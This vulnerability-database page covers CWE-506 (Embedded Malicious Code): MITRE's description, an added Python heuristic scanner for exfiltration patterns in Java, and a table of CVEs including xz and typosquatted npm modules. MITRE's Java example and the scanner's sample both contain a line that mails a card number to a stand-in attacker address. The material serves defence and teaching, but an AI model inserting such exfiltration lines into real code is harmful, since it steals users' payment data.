
CWE-506 (Embedded Malicious Code): Vulnerability Class, 78 entries

78 vulnerabilities classified as CWE-506 (Embedded Malicious Code). AI Chinese analysis included.

CWE-506 represents a critical integrity weakness where software contains intentionally embedded malicious code, often disguised as legitimate functionality. This flaw typically manifests as Trojan horses, trapdoors, or logic bombs, allowing developers or insiders to subvert system security at a predetermined time or under specific conditions. Exploitation occurs when the hidden code executes, granting unauthorized access, stealing data, or disrupting operations while the primary application appears to function normally. To mitigate this risk, organizations must enforce strict code review processes and utilize automated static analysis tools to detect suspicious patterns. Additionally, implementing robust access controls and maintaining transparent development practices ensure that no hidden backdoors remain in the final product, thereby preserving trust and preventing insider threats from compromising system integrity.

MITRE CWE Description
The product contains code that appears to be malicious in nature. Malicious flaws have acquired colorful names, including Trojan horse, trapdoor, timebomb, and logic-bomb. A developer might insert malicious code with the intent to subvert the security of a product or its host system at some time in the future. It generally refers to a program that performs a useful service but exploits rights of the program's user in a way the user does not intend.
Common Consequences (1)
Scope: Confidentiality, Integrity, Availability. Impact: Execute Unauthorized Code or Commands.
Mitigations (1)
Phase: Implementation, Operation. Remove the malicious code and start an effort to ensure that no more malicious code exists. This may require a detailed review of all code, as it is possible to hide a serious attack in only one or two lines of code. These lines may be located almost anywhere in an application and may have been intentionally obfuscated by the attacker.
Examples (1)
In the example below, a malicious developer has injected code to send credit card numbers to the developer's own email address.

    boolean authorizeCard(String ccn) {
        // Authorize credit card.
        ...
        mailCardNumber(ccn, "evil_developer@evil_domain.com");
    }

Bad example (Java)
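The mitigation above calls for a detailed review of all code, because the offending logic can hide in one or two lines. An added example of how a reviewer can partly automate the first pass is the toy static check below. It is not MITRE's code and not part of this page; it scans Java source for two indicators that warrant a manual look: a call whose name resembles a network or mail sink that receives a parameter with a sensitive-looking name, and a hard-coded e-mail address or URL literal in the same method. The sample input is a constructed class modelled on the authorizeCard snippet above, and the keyword lists, regexes and the mailCardNumber / gateway.charge identifiers are assumptions chosen for illustration.

```python
"""Toy static check for CWE-506-style exfiltration patterns in Java source.

Added example, not a MITRE or vendor tool. Heuristic only: it points a
reviewer at lines to inspect by hand; it does not prove code is malicious.
"""
import re
from typing import Dict, List

# Assumed heuristics (not from the page): parameter names that suggest
# sensitive data, callee names that suggest data leaving the process, and
# string literals that look like an external destination.
SENSITIVE_PARAM = re.compile(r"(ccn|card|pan|cvv|ssn|passw|secret|token|key)", re.I)
SINK_CALLEE = re.compile(r"(mail|send|post|upload|publish|connect|socket|http|dns)", re.I)
EXTERNAL_LITERAL = re.compile(r'"(?:[^"\s]+@[^"\s]+|https?://[^"\s]+)"')

# Matches a Java method header of the form `<type> <name>(<params>) {`.
METHOD_HEADER = re.compile(r"\b([\w<>\[\]]+)\s+(\w+)\s*\(([^)]*)\)\s*\{")
# Matches a simple call `<callee>(<args>)` with no nested parentheses.
CALL = re.compile(r"\b(\w+)\s*\(([^()]*)\)")
JAVA_KEYWORDS = {"if", "for", "while", "switch", "catch", "return", "new", "else"}

# Constructed sample modelled on the page's authorizeCard example; the
# gateway.charge call and the sendReceipt method are assumptions added so the
# scan has a benign neighbour to ignore.
SAMPLE_JAVA = """\
class Payments {
    boolean authorizeCard(String ccn) {
        // Authorize credit card.
        boolean approved = gateway.charge(ccn);
        mailCardNumber(ccn, "evil_developer@evil_domain.com");
        return approved;
    }

    void sendReceipt(String email, String orderId) {
        mailer.send(email, "Order " + orderId);
    }
}
"""


def _method_body(src: str, open_brace: int) -> str:
    """Return the text between the brace at open_brace and its matching close."""
    depth = 0
    for i in range(open_brace, len(src)):
        if src[i] == "{":
            depth += 1
        elif src[i] == "}":
            depth -= 1
            if depth == 0:
                return src[open_brace + 1:i]
    return src[open_brace + 1:]


def scan_java(src: str) -> List[Dict[str, object]]:
    """Return one finding per suspicious call: method, callee, line, params leaked,
    and whether the method also contains a hard-coded external destination."""
    findings: List[Dict[str, object]] = []
    for m in METHOD_HEADER.finditer(src):
        ret_type, name, params = m.group(1), m.group(2), m.group(3)
        if ret_type in JAVA_KEYWORDS or name in JAVA_KEYWORDS:
            continue  # `else if (...) {` and similar are not method headers
        # Each parameter is `Type name`; keep the name only.
        param_names = [p.strip().split()[-1] for p in params.split(",") if p.strip()]
        sensitive = {p for p in param_names if SENSITIVE_PARAM.search(p)}
        body_start = m.end() - 1  # index of the opening brace
        body = _method_body(src, body_start)
        has_external = bool(EXTERNAL_LITERAL.search(body))
        for c in CALL.finditer(body):
            callee, args = c.group(1), c.group(2)
            if callee in JAVA_KEYWORDS or not SINK_CALLEE.search(callee):
                continue
            leaked = sorted(a for a in sensitive if re.search(rf"\b{re.escape(a)}\b", args))
            if not leaked:
                continue
            # Translate the offset inside the body back to a 1-based source line.
            line = src.count("\n", 0, body_start + 1 + c.start()) + 1
            findings.append({
                "method": name,
                "callee": callee,
                "line": line,
                "params": leaked,
                "hardcoded_destination": has_external,
            })
    return findings


if __name__ == "__main__":
    for f in scan_java(SAMPLE_JAVA):
        dest = " (hard-coded destination literal in method)" if f["hardcoded_destination"] else ""
        print(f"line {f['line']}: {f['method']} passes {f['params']} to {f['callee']}{dest}")
```

On the constructed sample the scan reports only line 5, where authorizeCard passes ccn to mailCardNumber and the method carries a hard-coded address; the benign sendReceipt method is not flagged because none of its parameters look sensitive. A real review would feed every file in the tree through such a check and still read the flagged lines in context, since the heuristics are deliberately loose and an insider can rename identifiers to dodge them.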
CVE ID | Title | Product | CVSS | Severity | Published
CVE-2024-3094 | Xz: malicious code in distributed source | xz | 10.0 | Critical | 2024-03-29
CVE-2023-2003 | Embedded malicious code vulnerability in Unitronics Vision1210 | Vision1210 | 9.1 | Critical | 2023-07-13
CVE-2021-22887 | Pulse Secure PSA5000 and PSA7000 security vulnerability | PSA5000, PSA7000 | 5.7 | - | 2021-03-16
CVE-2020-15165 | Potentially tampered sources on Play Store for Chameleon Mini Live Debugger | ChameleonMiniLiveDebugger | 9.3 | Critical | 2020-08-28
CVE-2017-16202 | cofeescript module security vulnerability | coffeescript node module | 7.5 | - | 2018-06-07
CVE-2017-16207 | discordi.js security vulnerability | discordi.js node module | 7.3 | - | 2018-06-07
CVE-2017-16205 | coffescript module security vulnerability | coffeescript node module | 7.5 | - | 2018-06-07
CVE-2017-16204 | jquey module security vulnerability | jquey node module | 7.5 | - | 2018-06-07
CVE-2017-16203 | coffe-script module security vulnerability | coffeescript node module | 7.5 | - | 2018-06-07
CVE-2017-16128 | npm-script-demo security vulnerability | npm-script-demo node module | 9.8 | - | 2018-06-07
CVE-2017-16056 | mssql.js security vulnerability | mssql.js node module | 7.5 | - | 2018-06-07
CVE-2017-16057 | nodemssql security vulnerability | nodemssql node module | 7.5 | - | 2018-06-07
CVE-2017-16058 | gruntcli security vulnerability | gruntcli node module | 7.5 | - | 2018-06-07
CVE-2017-16059 | mssql-node security vulnerability | mssql-node node module | 7.5 | - | 2018-06-07
CVE-2017-16060 | babelcli security vulnerability | babelcli node module | 7.5 | - | 2018-06-07
CVE-2017-16063 | node-opensl security vulnerability | node-opensl node module | 7.5 | - | 2018-06-07
CVE-2017-16064 | node-openssl security vulnerability | node-openssl node module | 7.5 | - | 2018-06-07
CVE-2017-16065 | openssl.js security vulnerability | openssl.js node module | 7.5 | - | 2018-06-07
CVE-2017-16066 | opencv.js security vulnerability | opencv.js node module | 7.5 | - | 2018-06-07
CVE-2017-16067 | node-opencv security vulnerability | node-opencv node module | 7.5 | - | 2018-06-07
CVE-2017-16068 | ffmepg security vulnerability | ffmepg node module | 7.5 | - | 2018-06-07
CVE-2017-16069 | nodeffmpeg security vulnerability | nodeffmpeg node module | 7.5 | - | 2018-06-07
CVE-2017-16071 | nodemailer.js security vulnerability | nodemailer-js node module | 7.5 | - | 2018-06-07
CVE-2017-16081 | cross-env.js security vulnerability | cross-env.js node module | 7.5 | - | 2018-06-07
CVE-2017-16080 | nodesass security vulnerability | nodesass node module | 7.5 | - | 2018-06-07
CVE-2017-16079 | smb security vulnerability | smb node module | 7.5 | - | 2018-06-07
CVE-2017-16078 | shadowsock security vulnerability | shadowsock node module | 7.5 | - | 2018-06-07
CVE-2017-16077 | mongose security vulnerability | mongose node module | 7.5 | - | 2018-06-07
CVE-2017-16075 | http-proxy.js security vulnerability | http-proxy.js node module | 7.5 | - | 2018-06-07
CVE-2017-16076 | proxy.js security vulnerability | proxy.js node module | 7.5 | - | 2018-06-07

Vulnerabilities classified as CWE-506 (Embedded Malicious Code) represent 78 CVEs. The CWE taxonomy describes the weakness; review individual CVEs for product-specific impact.